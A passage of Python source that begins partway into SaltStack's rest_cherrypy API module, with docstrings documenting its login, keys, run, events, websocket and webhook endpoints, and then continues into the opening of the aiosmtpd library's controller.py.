Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
timeout = int(timeout) if timeout.isdigit() else None
if jid:
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid',
'args': (jid,),
'timeout': timeout,
}, {
'client': 'runner',
'fun': 'jobs.list_job',
'args': (jid,),
'timeout': timeout,
}]
else:
lowstate = [{
'client': 'runner',
'fun': 'jobs.list_jobs',
'timeout': timeout,
}]
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
self._cp_config['tools.salt_token.on'] = True
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
def POST(self, mid, keysize=None, force=None, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
.. versionadded:: 2014.7.0
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
self._cp_config['tools.hypermedia_out.on'] = False
self._cp_config['tools.sessions.on'] = False
lowstate = [{
'client': 'wheel',
'fun': 'key.gen_accept',
'id_': mid,
}]
if keysize:
lowstate[0]['keysize'] = keysize
if force:
lowstate[0]['force'] = force
lowstate[0].update(kwargs)
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid)
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if 'groups' in token:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
perms = []
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
perms = perms or None
else:
perms = eauth.get(token['name'], eauth.get('*'))
if perms is None:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad, authentication
should be handled by the SSH layer itself. The use of the salt-ssh client does not
require a salt master to be running. Instead, only a roster file must be present
in the salt configuration directory.
All SSH client requests are synchronous.
** Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_sesion, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_sesion.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) {
console.debug('Tag: ', e.data.tag)
console.debug('Data: ', e.data.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:**
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
raw_body = cherrypy.serving.request.raw_body
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
controller.py | # Copyright 2014-2021 The aiosmtpd Developers
# SPDX-License-Identifier: Apache-2.0
import asyncio
import errno
import os
import ssl
import sys
import threading
import time
from abc import ABCMeta, abstractmethod
from contextlib import ExitStack
from pathlib import Path
from socket import AF_INET6, SOCK_STREAM, create_connection, has_ipv6
from socket import socket as makesock
from socket import timeout as socket_timeout
try:
from socket import AF_UNIX
except ImportError: # pragma: on-not-win32
AF_UNIX = None
from typing import Any, Coroutine, Dict, Optional, Union
if sys.version_info >= (3, 8):
from typing import Literal # pragma: py-lt-38
else: # pragma: py-ge-38
from typing_extensions import Literal
from warnings import warn
from public import public
from aiosmtpd.smtp import SMTP
AsyncServer = asyncio.base_events.Server
DEFAULT_READY_TIMEOUT: float = 5.0
@public
class IP6_IS:
# Apparently errno.E* constants adapts to the OS, so on Windows they will
# automatically use the WSAE* constants
NO = {errno.EADDRNOTAVAIL, errno.EAFNOSUPPORT}
YES = {errno.EADDRINUSE}
def _has_ipv6() -> bool:
# Helper function to assist in mocking
return has_ipv6
@public
def get_localhost() -> Literal["::1", "127.0.0.1"]:
"""Returns numeric address to localhost depending on IPv6 availability"""
# Ref:
# - https://github.com/urllib3/urllib3/pull/611#issuecomment-100954017
# - https://github.com/python/cpython/blob/ :
# - v3.6.13/Lib/test/support/__init__.py#L745-L758
# - v3.9.1/Lib/test/support/socket_helper.py#L124-L137
if not _has_ipv6():
# socket.has_ipv6 only tells us of current Python's IPv6 support, not the
# system's. But if the current Python does not support IPv6, it's pointless to
# explore further.
return "127.0.0.1"
try:
with makesock(AF_INET6, SOCK_STREAM) as sock:
sock.bind(("::1", 0))
# If we reach this point, that means we can successfully bind ::1 (on random
# unused port), so IPv6 is definitely supported
return "::1"
except OSError as e:
if e.errno in IP6_IS.NO:
return "127.0.0.1"
if e.errno in IP6_IS.YES:
# We shouldn't ever get these errors, but if we do, that means IPv6 is
# supported
return "::1"
# Other kinds of errors MUST be raised so we can inspect
raise
class _FakeServer(asyncio.StreamReaderProtocol):
"""
Returned by _factory_invoker() in lieu of an SMTP instance in case
factory() failed to instantiate an SMTP instance.
"""
def __init__(self, loop: asyncio.AbstractEventLoop):
# Imitate what SMTP does
super().__init__(
asyncio.StreamReader(loop=loop),
client_connected_cb=self._client_connected_cb,
loop=loop,
)
def _client_connected_cb(
self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter
) -> None:
pass
@public
class BaseController(metaclass=ABCMeta):
smtpd = None
server: Optional[AsyncServer] = None
server_coro: Optional[Coroutine] = None
_factory_invoked: threading.Event = None
def __init__(
self,
handler: Any,
loop: asyncio.AbstractEventLoop = None,
*,
ssl_context: Optional[ssl.SSLContext] = None,
# SMTP parameters
server_hostname: Optional[str] = None,
**SMTP_parameters,
):
self.handler = handler
if loop is None:
self.loop = asyncio.new_event_loop()
else:
self.loop = loop
self.ssl_context = ssl_context
self.SMTP_kwargs: Dict[str, Any] = {}
if "server_kwargs" in SMTP_parameters:
warn(
"server_kwargs will be removed in version 2.0. "
"Just specify the keyword arguments to forward to SMTP "
"as kwargs to this __init__ method.",
DeprecationWarning,
)
self.SMTP_kwargs = SMTP_parameters.pop("server_kwargs")
self.SMTP_kwargs.update(SMTP_parameters)
